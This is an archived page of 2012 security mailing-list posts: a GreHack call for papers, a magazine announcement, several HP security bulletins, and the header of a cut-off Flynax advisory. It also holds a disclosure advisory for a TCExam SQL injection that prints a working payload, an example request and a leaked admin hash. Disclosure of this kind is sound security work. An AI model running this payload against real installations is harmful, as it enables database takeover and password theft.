GreHack 2012 - LAST Call For Papers (Grenoble, France) till 15th August 2012

2012-08-14 Thread Fabien DUCHENE 
--
*GreHack 2012* LAST Call For Papers .. till 15th August 2012.
--
http://grehack.org GreHack 2012 conference will take place in Grenoble
(Alps), France on October 19th-20th 2012 and brings together students,
academia, industry and government to exchange knowledge around
emerging issues in the security + hacking world. During the night, a
Capture The Flag will take place. Each paper is peer reviewed at least 3 times.

-
*Suggested Topics (not limited to)*
-
http://grehack.org/en/index.php/GreHack_2012-Call_For_Papers-english/
- Track: ethical, legal and philosophical
-- greyhat hacking: a consumer advance, or a risk for worldwide security?
-- current state of laws relative to cyber-security and hacking +
justified suggestions of modifications

- Track: technical
-- Hadopi: why is it a technical and legal failure? how to exploit in
memory vulnerabilities of Hadopi approved software?
-- In Memory Vulnerabilities
  --- Windows 8: heap analysis, kernel structures and new memory protections
  --- Exploit Corner: come present us your last sploit!
-- Hardcore Penetration Testing
  --- Code obfuscation to complicate Reverse Engineering
  --- Discrete Attacks (eg: without writing on the filesystem)
  --- Hypervisor evasion
  --- Vulnerabilities and exploits on defensive security tools (eg:
AntiMalwares, Firewalls, IDS)
-- Attacking Infrastructures
  --- Internet: how to root your ***box? Which security
functionalities (and properties) are provided? How to bypass them?
  --- ipsec, ipv6
  --- routing protocols
  --- wireless: 802.11, réseaux 3G, 4G, WiMAX, RFID
  --- sensor networks
-- Malwares and Botnets
  --- state of the art of botnets redundancy mechanism
  --- self-code modification (polymorphism) of malwares
  --- ability of antimalwares to detect slighly mutated samples
  --- vulnerabilities in antimalwares drivers

- Track: research
-- Learning and Offensive Security
  --- static and dynamic analysis
  --- dumb/simple/basic fuzzing and smart-fuzzing for automating
vulnerability detection
  --- metrics for exploitability of vulns (in memory, web)
  --- model checking
  --- advances in reverse-engineering automation and model inference
  --- concolic execution
-- Hardware Attacks
  --- nanotechnology
  --- fault injection in memory via laser
  --- smart cards
  --- transportations
  --- medical tools
  --- embedded malwares
-- Cryptology
  --- influence of the environment on PRNG entropy
  --- mathematic aspects in current cryptology
-- Defensive Security
  --- Trust Based Computing
  --- New Access Control Models for processes isolation
  --- New H/W + S/W for increasing the cost of exploitation

*Remark*
- We highly encourage original topics that break with traditional
research directions
- We will favor presentations with tools demonstrations or results

-
*Important Dates*
-
- CFP Opens: 1st May 2012
- CFP Closing Date: EXTENDED to 15th August 2012 (due to several
requests. was initially 15th July 2012)
- Final speakers List online: 09 September 2012
- Conference Dates: 19 October 2012 9am-7pm
- Capture The Flag: night (19 October 2012 9pm till 20 October 2012
6am Paris time :)

-
*Program Committee*
-

- Dan Alloun (Intel)
- Florent Autreau (Mataru)
- Claude Castelluccia (INRIA)
- Fabien Duchene (LIG)
- Philippe Elbaz-Vincent (UJF)
- Karim Hossen (LIG)
- Pascal Lafoucarde (VERIMAG)
- Arnaud Maillet (Evidian RD, Ensimag student)
- Pascal Malterre (CEA)
- Sanjay Rawat (LIG)
- Guillaume Touron (Ensimag student)
- Marie-Laure Potet (VERIMAG)
- anonymous researcher (private company in vulnerability research)

-
*Invited Talks*
-
- Eric Freyssinet (LIP6, Gendarmerie) Botnet: From Observation to Investigation
- Christophe Devine (ANSSI) mobile telephony security: a compared
study. till what degree can we trust mobile operating systems and
radio protocols?
- Philippe Elbaz-Vincent (UJF) attacks on randomness of hardware Prime
Random Number Generator
- Regis Leveugle (TIMA) attacks on secure hardware
- Kostya Kortchinsky (Microsoft and formerly Immunity Inc.) - TBA

-
*Speaker Benefits*
-
- Free pass to the conference
- Accommodation during the Conference (1 night)
- GreHack will participate to travel expenses (limited budget)

-
*Submission Guidelines*
-
Call for Papers is open till 15th August 2012.
Consider submitting even if your topic is not listed above.
http://grehack.org/index.php/GreHack_2012-Call_For_Papers-english
send your submission to: grehack-program_committee _A_T_ car-online.fr

-
*Capture The Flag*
-
http://grehack.org/index.php/GreHack-2012-Capture_The_Flag_rules-english

[Announcement] ClubHack Magazine's Aug 2012 Issue Released

2012-08-14 Thread abhijeet 
Hello Readers,

ClubHack Magazine's Issue 31 - August 2012 is here.
 
This issue covers following articles:-

0x00 Tech Gyan - Malware Memory Forensics
0x01 Tool Gyan - Tamper Data
0x02 Mom's Guide - Apple iOS vulnerabilities
0x03 Legal Gyan - VARIOUS AUTHORITIES UNDER THE IT ACT
0x04 Matriux Vibhag - Matriux Ec-Centric
0x05 Poster - Security by luck, not possible

PDF version can be download from:- http://www.chmag.in/issue/aug2012.pdf
Check http://chmag.in/ for all the articles.

Articles, Feedback  suggestions are welcome. Please send your bouquets or 
brickbats to i...@chmag.in

--
Regards,
Team CHMag
http://chmag.in

TCExam Edit SQL Injection

2012-08-14 Thread research 
/---\
| TCExam Edit SQL Injection |
\---/


Summary
===

TCExam 11.3.007 is prone to a SQL injection flaw located in
tce_edit_answer.php and tce_edit_question.php. These files pass a
'subject_module_id' parameter into a SQL statement without satisfactory
sanitisation. An attacker with authoring permissions could leverage this
vulnerability to take full control of the database.

CVE number: CVE-2012-4237
Impact: High
Vendor homepage: http://www.tcexam.org/
Vendor notified: 06/08/2012
Vendor fixed: 06/08/2012
Credit: Chris Cooper of Reaction Information Security
(http://www.reactionis.co.uk/)

This advisory is posted at:

http://www.reactionpenetrationtesting.co.uk/tcexam-sql-injection.html


Affected Products
 

Confirmed in TCExam 11.3.007. Prior versions may also be affected.


Details
===

The 'subject_module_id' parameters in the tce_edit_answer.php and
tce_edit_question.php pages were found to be subject to a SQL injection
vulnerability. It was possible to inject arbitrary SQL statements into a
WHERE clause, retrieving information from the database via the page output.
The attacker must be authenticated as a valid user with a permission level
of 5 or above in order for the attack to be successful.

The following payload will extract the admin password hash (some characters
may need to be URL encoded):

99.9 union all select (select
concat(0x7e,0x27,tce_users.user_password,0x27,0x7e) from `tcexam`.tce_users
where tce_users.user_name = CHAR(97,100,109,105,110) limit 0,1)
,0x0,0x0,0x0,0x0,0x0--

---
Example Request:
+---

GET
/TCExam/admin/code/tce_edit_answer.php?subject_module_id=99.9+union+all+
select+%28select+concat%280x7e%2C0x27%2Ctce_users.user_password%2C0x27%2C0x7
e%29+from+%60tcexam%60.tce_users+where+tce_users.user_name+%3d+CHAR(97,100,1
09,105,110)+limit+0%2C1%29+%2C0x0%2C0x0%2C0x0%2C0x0%2C0x0--question_subject
_id=3answer_question_id=7 HTTP/1.1
Host: 192.168.0.6
Referer: http://192.168.0.6/TCExam/admin/code/tce_edit_question.php
Cookie: PHPSESSID=db1fe2b665994ff76356e7a28abfa5df

---
Example Response:
+

--- SNIP ---
select name=question_subject_id id=question_subject_id size=0
onchange=document.getElementById('form_answereditor').changesubject.value=1
; document.getElementById('form_answereditor').submit(); title=test
topic option value=~'c574b5b09ab10f4f39ae9dce6d539cf0'~1. -
[%00]/option /select
--- SNIP ---

Impact
==

An authenticated user with a permission level of 5 or higher could take full
control of the database, essentially allowing them to escalate their
privileges by either directly controlling the database, cracking an
administrator password or potentially changing their own permission level.
Furthermore, an attacker might be able to leverage this vulnerability in
order to further compromise the host machine.

Solution


Upgrade to TCExam 11.3.008.


Distribution


In addition to posting on the website, a text version of this notice has
been posted to the following e-mail and Usenet news recipients.

* bugtraq () securityfocus com
* full-disclosure () lists grok org uk
 

Future updates of this advisory, if any, will be placed on the ReactionIS
corporate website, but may or may not be actively announced on mailing lists
or newsgroups. Users concerned about this problem are encouraged to check
the URL below for any updates:


http://www.reactionpenetrationtesting.co.uk/tcexam-sql-injection.html


==

Reaction Information Security 
Lombard House Business Centre,
Suite 117,
12-17 Upper Bridge Street,
Canterbury, Kent, CT1 2NF

Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk

[security bulletin] HPSBMU02801 SSRT100879 rev.1 - HP Fortify Software Security Center, Remote Unauthenticated Disclosure of Information

2012-08-14 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03447824

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03447824
Version: 1

HPSBMU02801 SSRT100879 rev.1 - HP Fortify Software Security Center, Remote
Unauthenticated Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote unauthenticated disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Fortify
Software Security Center. The vulnerability could be remotely exploited to
allow unauthenticated disclosure of information.

References: CVE-2012-3248, FLC01

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5 running on
Windows, Linux and Solaris

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-3248(AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Luca Carettoni for reporting this issue to
security-al...@hp.com

RESOLUTION

HP has provided patches for HP Fortify Software Security Center v3.1, v3.3,
v3.4, and v3.5. This issue is resolved in v3.60 and greater. Contact HP
Fortify support at fortifytechsupp...@hp.com to receive instructions on how
to download the patches.

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAlApNA4ACgkQ4B86/C0qfVnHngCcCK7g6DUKLL2Y17qv5EjzZjXM
wm8AoMCpGpka9JsF+OTfrWcJDDfBdlUr
=GAbD
-END PGP SIGNATURE-

[security bulletin] HPSBMU02802 SSRT100923 rev.1 - HP Fortify Software Security Center, Remote Disclosure of Privileged Information

2012-08-14 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03447895

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03447895
Version: 1

HPSBMU02802 SSRT100923 rev.1 - HP Fortify Software Security Center, Remote
Disclosure of Privileged Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote disclosure of privileged information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Fortify
Software Security Center. The vulnerability could be remotely exploited to
allow disclosure of privileged information.

References: CVE-2012-3249, FLC02

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Fortify Software Security Center v3.1, v3.3, v3.4, and v3.5 running on
Windows, Linux and Solaris

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-3249(AV:N/AC:M/Au:S/C:P/I:N/A:N)   3.5
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Luca Carettoni for reporting this issue to
security-al...@hp.com

RESOLUTION

HP has provided patches for HP Fortify Software Security Center v3.1, v3.3,
v3.4, and v3.5. This issue is resolved in v3.60 and greater. Contact HP
Fortify support at fortifytechsupp...@hp.com to receive instructions on how
to download the patches.

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAlApOTwACgkQ4B86/C0qfVltowCfYhdJ12AVyNXUDwAMssvCvHu3
O/EAn1ABGtPFd2/EekJxvSMBzg1XyX6J
=Rb/z
-END PGP SIGNATURE-

[security bulletin] HPSBMU02800 SSRT100921 rev.1 - HP Service Manager and HP Service Center Server, Remote Denial of Service (DoS)

2012-08-14 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03447828

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03447828
Version: 1

HPSBMU02800 SSRT100921 rev.1 - HP Service Manager and HP Service Center
Server, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Service
Manager and HP Service Center Server. The vulnerability could be remotely
exploited resulting in a Denial of Service (DoS).

References: CVE-2012-3250

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Service Manager Server 9.30, 9.21, and 7.11.
HP Service Center Server 6.28.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-3250(AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following patch kits available to resolve these
vulnerabilities.

HP Product Versions
 Platform / Patch Kit URL

SM9.30P4 Server
 Windows Server 9.30.274 p4
 http://support.openview.hp.com/selfsolve/document/KM1415197?searchIdentifier
=-72890797%3a138eb464d5e%3a5d91resultType=documentdocumentURL=KM1415197res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

HP Itanium Server 9.30.274 p4
 http://support.openview.hp.com/selfsolve/document/KM1415199?searchIdentifier
=-72890797%3a138eb464d5e%3a5d91resultType=documentdocumentURL=KM1415199res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

Linux Server 9.30.274 p4
 http://support.openview.hp.com/selfsolve/document/KM1415195?searchIdentifier
=-72890797%3a138eb464d5e%3a5d91resultType=documentdocumentURL=KM1415195res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

Solaris Server 9.30.274 p4
 http://support.openview.hp.com/selfsolve/document/KM1415192?searchIdentifier
=-72890797%3a138eb464d5e%3a5d91resultType=documentdocumentURL=KM1415192res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

AIX Server 9.30.274 p4
 http://support.openview.hp.com/selfsolve/document/KM1415201?searchIdentifier
=-72890797%3a138eb464d5e%3a5d91resultType=documentdocumentURL=KM1415201res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

SM9.21P5 Server
 Windows Server 9.21.013
 http://support.openview.hp.com/selfsolve/document/KM1036626?searchIdentifier
=-72890797%3a138eb464d5e%3a6374resultType=documentdocumentURL=KM1036626res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

HP Itanium Server 9.21.290 p5
 http://support.openview.hp.com/selfsolve/document/KM1396806?searchIdentifier
=-72890797%3a138eb464d5e%3a62d5resultType=documentdocumentURL=KM1396806res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

HP parisc Server 9.21.290 p5
 http://support.openview.hp.com/selfsolve/document/KM1396804?searchIdentifier
=-72890797%3a138eb464d5e%3a6374resultType=documentdocumentURL=KM1396804res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

Linux Server 9.21.290 p5
 http://support.openview.hp.com/selfsolve/document/KM1396802?searchIdentifier
=-72890797%3a138eb464d5e%3a6374resultType=documentdocumentURL=KM1396802res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

Solaris Server 9.21.290 p5
 http://support.openview.hp.com/selfsolve/document/KM1396801?searchIdentifier
=-72890797%3a138eb464d5e%3a6374resultType=documentdocumentURL=KM1396801res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

AIX Server 9.21.290 p5
 http://support.openview.hp.com/selfsolve/document/KM1396808?searchIdentifier
=-72890797%3a138eb464d5e%3a62d5resultType=documentdocumentURL=KM1396808res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

SM7.11P19 Server
 Windows Server 7.11.532 p19
 http://support.openview.hp.com/selfsolve/document/KM1448273?searchIdentifier
=-72890797%3a138eb464d5e%3a6481resultType=documentdocumentURL=KM1448273res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

HP Itanium Server 7.11.532 p19
 http://support.openview.hp.com/selfsolve/document/KM1448276?searchIdentifier
=-72890797%3a138eb464d5e%3a6481resultType=documentdocumentURL=KM1448276res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

HP parisc Server 7.11.532 p19
 http://support.openview.hp.com/selfsolve/document/KM1448274?searchIdentifier
=-72890797%3a138eb464d5e%3a6481resultType=documentdocumentURL=KM1448274res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

Linux x86 Server 7.11.532 p19
 http://support.openview.hp.com/selfsolve/document/KM1448277?searchIdentifier

[security bulletin] HPSBMU02803 SSRT100926 rev.1 - HP Service Manager and HP Service Center Web Tier, Remote Cross Site Scripting (XSS)

2012-08-14 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03450382

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03450382
Version: 1

HPSBMU02803 SSRT100926 rev.1 - HP Service Manager and HP Service Center Web
Tier, Remote Cross Site Scripting (XSS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

Potential Security Impact: Remote cross site scripting (XSS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Service
Manager and HP Service Center Web Tier. The vulnerability could be remotely
exploited resulting in cross site scripting (XSS).

References: CVE-2012-3251

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Service Manager Web Tier 9.30, 9.21, and 7.11.
HP Service Center Web Tier 6.28.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-3251(AV:N/AC:M/Au:N/C:P/I:P/A:P)   6.8
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following patch kits available to resolve these
vulnerabilities.

HP Product Versions
 Patch Kit URL

SM9.30P4 Web Tier
 http://support.openview.hp.com/selfsolve/document/KM1415193?searchIdentifier
=-72890797%3a138eb464d5e%3a5a08resultType=documentdocumentURL=KM1415193res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

SM9.21p5 Web Tier
 http://support.openview.hp.com/selfsolve/document/KM1396812?searchIdentifier
=-72890797%3a138eb464d5e%3a5a66resultType=documentdocumentURL=KM1396812res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

SM7.11p19 Web Tier
 http://support.openview.hp.com/selfsolve/document/KM1448272?searchIdentifier
=-72890797%3a138eb464d5e%3a5957resultType=documentdocumentURL=KM1448272res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

SC6.2.8.10 Web Tier
 http://support.openview.hp.com/selfsolve/document/KM1320938?searchIdentifier
=-72890797%3a138eb464d5e%3a5a86resultType=documentdocumentURL=KM1320938res
ultsURL=%2fselfsolve%2fpatchesallowReturn=true

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

[security bulletin] HPSBUX02805 SSRT100919 rev.1 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities

2012-08-14 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03441075

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03441075
Version: 1

HPSBUX02805 SSRT100919 rev.1 - HP-UX Running Java, Remote Unauthorized
Access, Disclosure of Information, and Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

- -

Potential Security Impact: Remote unauthorized access, disclosure of
information, and other vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime
Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These
vulnerabilities could allow remote unauthorized access, disclosure of
information, and other vulnerabilities.

References: CVE-2012-0508, CVE-2012-0551, CVE-2012-1711, CVE-2012-1713,
CVE-2012-1716, CVE-2012-1718, CVE-2012-1719, CVE-2012-1720, CVE-2012-1721,
CVE-2012-1722, CVE-2012-1723, CVE-2012-1724, CVE-2012-1725, CVE-2012-1726

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE 7.0.02 and 6.0.15

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-0508(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-0551(AV:N/AC:M/Au:N/C:P/I:P/A:N)5.8
CVE-2012-1711(AV:N/AC:L/Au:N/C:P/I:P/A:P)7.5
CVE-2012-1713(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1716(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1718(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2012-1719(AV:N/AC:L/Au:N/C:N/I:P/A:N)5.0
CVE-2012-1720(AV:L/AC:H/Au:N/C:P/I:P/A:P)3.7
CVE-2012-1721(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1722(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1723(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1724(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2012-1725(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1726(AV:N/AC:L/Au:N/C:P/I:P/A:N)6.4
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following Java version upgrade to resolve these
vulnerabilities.
The upgrade is available from the following location

http://www.hp.com/go/java

HP-UX B.11.23, B.11.31 / JDK and JRE v7.0.02 or subsequent

HP-UX B.11.23, B.11.31 / JDK and JRE v6.0.15 or subsequent

HP-UX B.11.11, B.11.23 / JDK and JRE v6.0.15 or subsequent

MANUAL ACTIONS: Yes - Update
For Java v7.0 update to Java v7.0.02 or subsequent
For Java v6.0 update to Java v6.0.15 or subsequent

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.23
HP-UX B.11.31
===
Jdk70.JDK70-COM
Jdk70.JDK70-DEMO
Jdk70.JDK70-IPF32
Jdk70.JDK70-IPF64
Jre70.JRE70-COM
Jre70.JRE70-IPF32
Jre70.JRE70-IPF32-HS
Jre70.JRE70-IPF64
Jre70.JRE70-IPF64-HS
action: install revision 1.7.0.02.00 or subsequent

HP-UX B.11.23
HP-UX B.11.31
===
Jdk60.JDK60-COM
Jdk60.JDK60-DEMO
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.15.00 or subsequent

HP-UX B.11.11
HP-UX B.11.23
===
Jdk60.JDK60-COM
Jdk60.JDK60-DEMO
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jre60.JRE60-COM
Jre60.JRE60-COM-DOC
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
action: install revision 1.6.0.15.00 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to

Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities

2012-08-14 Thread Vulnerability Lab 
Title:
==
Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities


Date:
=
2012-07-13


References:
===
